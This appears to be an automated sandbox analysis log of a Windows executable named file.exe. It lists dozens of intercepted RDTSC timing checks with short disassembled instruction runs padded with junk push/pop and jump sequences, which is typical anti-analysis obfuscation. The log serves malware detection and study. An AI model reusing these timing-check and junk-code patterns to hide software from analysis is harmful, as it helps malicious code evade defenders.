            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9CE4 second address: AA9D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD6776h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jmp 00007FAD40FD6771h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FAD40FD6766h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D1E second address: AA9D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9D24 second address: AA9D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6770h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA01B second address: AAA04F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FC0C65h 0x00000012 jne 00007FAD40FC0C62h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA04F second address: AAA055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA427 second address: AAA448 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAD40FC0C68h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA5B5 second address: AAA5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA5BB second address: AAA5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA5C6 second address: AAA5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA715 second address: AAA737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C68h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF278 second address: AAF27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7BAE second address: AB7BDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FAD40FC0C5Ch 0x0000000c jl 00007FAD40FC0C56h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FAD40FC0C65h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7BDD second address: AB7BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7D6F second address: AB7D9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 push ecx 0x00000008 jnl 00007FAD40FC0C56h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FAD40FC0C58h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007FAD40FC0C56h 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7D9D second address: AB7DA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8252 second address: AB826B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAD40FC0C56h 0x0000000a jo 00007FAD40FC0C56h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB826B second address: AB826F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB86B1 second address: AB86BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB86BB second address: AB86FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6778h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAD40FD6772h 0x0000000e jmp 00007FAD40FD676Dh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB886A second address: AB886F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB886F second address: AB8875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB89D5 second address: AB89E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FAD40FC0C56h 0x0000000c jc 00007FAD40FC0C56h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB928B second address: AB9296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9A74 second address: AB9A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAD40FC0C56h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB774A second address: AB7753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0DF5 second address: AC0E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FC0C63h 0x00000009 pop edi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0E0D second address: AC0E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FAD40FD6766h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0822 second address: AC083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FC0C60h 0x00000009 jno 00007FAD40FC0C56h 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC083D second address: AC0847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FAD40FD6766h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF9E2 second address: ACF9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF545 second address: ACF550 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007FAD40FD6766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF37D second address: ADF381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF381 second address: ADF385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF385 second address: ADF38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF38F second address: ADF393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF214 second address: ADF21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF21A second address: ADF25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAD40FD6775h 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FAD40FD6779h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FAD40FD676Ah 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF25F second address: ADF263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01BA7 second address: A01BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD676Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01BB6 second address: A01BC4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6D52 second address: AE6D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7149 second address: AE714F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE714F second address: AE715E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jno 00007FAD40FD6766h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7454 second address: AE749A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C5Ch 0x00000007 jl 00007FAD40FC0C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FAD40FC0C65h 0x00000015 jmp 00007FAD40FC0C64h 0x0000001a popad 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE749A second address: AE74A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7606 second address: AE760C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBA45 second address: AEBA4B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBBE5 second address: AEBBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5567 second address: AF557B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FAD40FD6768h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF557B second address: AF5584 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCB67 second address: AFCB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCB6B second address: AFCB98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAD40FC0C65h 0x00000008 pushad 0x00000009 jmp 00007FAD40FC0C63h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE18C second address: AFE19F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Eh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E24F second address: B0E266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FAD40FC0C5Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E38A second address: B0E3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jnc 00007FAD40FD6766h 0x0000000d jnl 00007FAD40FD6766h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E3A0 second address: B0E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28504 second address: B2850A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2850A second address: B28515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAD40FC0C56h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27539 second address: B27545 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD40FD676Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27545 second address: B2755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 ja 00007FAD40FC0C56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2755C second address: B27569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAD40FD6766h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27830 second address: B2783F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FAD40FC0C5Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27EBA second address: B27EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27EBE second address: B27ED6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FAD40FC0C56h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29C13 second address: B29C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD40FD6766h 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FAD40FD6771h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FAD40FD676Bh 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C5C7 second address: B2C5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD40FC0C69h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C5E9 second address: B2C5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C854 second address: B2C859 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C859 second address: B2C8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FAD40FD6768h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jnc 00007FAD40FD6767h 0x00000028 push 00000004h 0x0000002a movsx edx, ax 0x0000002d push C2F5A85Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007FAD40FD676Eh 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C8A6 second address: B2C8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CBDB second address: B2CBFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD40FD676Bh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4356D second address: A43582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FAD40FC0C56h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43582 second address: A43586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0428 second address: 47D042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D042E second address: 47D0432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0524 second address: 47D0578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FAD40FC0C60h 0x00000011 lea eax, dword ptr [ebp-04h] 0x00000014 jmp 00007FAD40FC0C60h 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FAD40FC0C67h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0578 second address: 47D0590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6774h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0590 second address: 47D0594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0594 second address: 47D05B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAD40FD676Eh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, 9130h 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D061D second address: 47D0660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FAD40FC0C66h 0x00000016 sub ch, FFFFFFC8h 0x00000019 jmp 00007FAD40FC0C5Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0660 second address: 47D0694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 37E29D6Ah 0x00000008 call 00007FAD40FD676Bh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov esi, eax 0x00000013 jmp 00007FAD40FD676Fh 0x00000018 je 00007FAD40FD67C7h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0694 second address: 47D0698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0698 second address: 47D069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D069C second address: 47D06A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D06BB second address: 47D06C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D06C1 second address: 47D06D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D06D0 second address: 47D075D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d pushad 0x0000000e call 00007FAD40FD676Ch 0x00000013 mov edx, esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FAD40FD676Dh 0x0000001d xor cl, FFFFFFB6h 0x00000020 jmp 00007FAD40FD6771h 0x00000025 popfd 0x00000026 mov ax, A5A7h 0x0000002a popad 0x0000002b popad 0x0000002c pop esi 0x0000002d jmp 00007FAD40FD676Ah 0x00000032 leave 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FAD40FD676Eh 0x0000003a add ecx, 4EA1DE08h 0x00000040 jmp 00007FAD40FD676Bh 0x00000045 popfd 0x00000046 push eax 0x00000047 push edx 0x00000048 mov cl, ECh 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D075D second address: 47C022B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAD40FC0C5Bh 0x00000008 adc eax, 601D464Eh 0x0000000e jmp 00007FAD40FC0C69h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 retn 0004h 0x0000001a nop 0x0000001b cmp eax, 00000000h 0x0000001e setne al 0x00000021 xor ebx, ebx 0x00000023 test al, 01h 0x00000025 jne 00007FAD40FC0C57h 0x00000027 xor eax, eax 0x00000029 sub esp, 08h 0x0000002c mov dword ptr [esp], 00000000h 0x00000033 mov dword ptr [esp+04h], 00000000h 0x0000003b call 00007FAD44F0A2A5h 0x00000040 mov edi, edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FAD40FC0C65h 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C022B second address: 47C0290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD40FD6777h 0x00000009 or si, A47Eh 0x0000000e jmp 00007FAD40FD6779h 0x00000013 popfd 0x00000014 jmp 00007FAD40FD6770h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FAD40FD6770h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
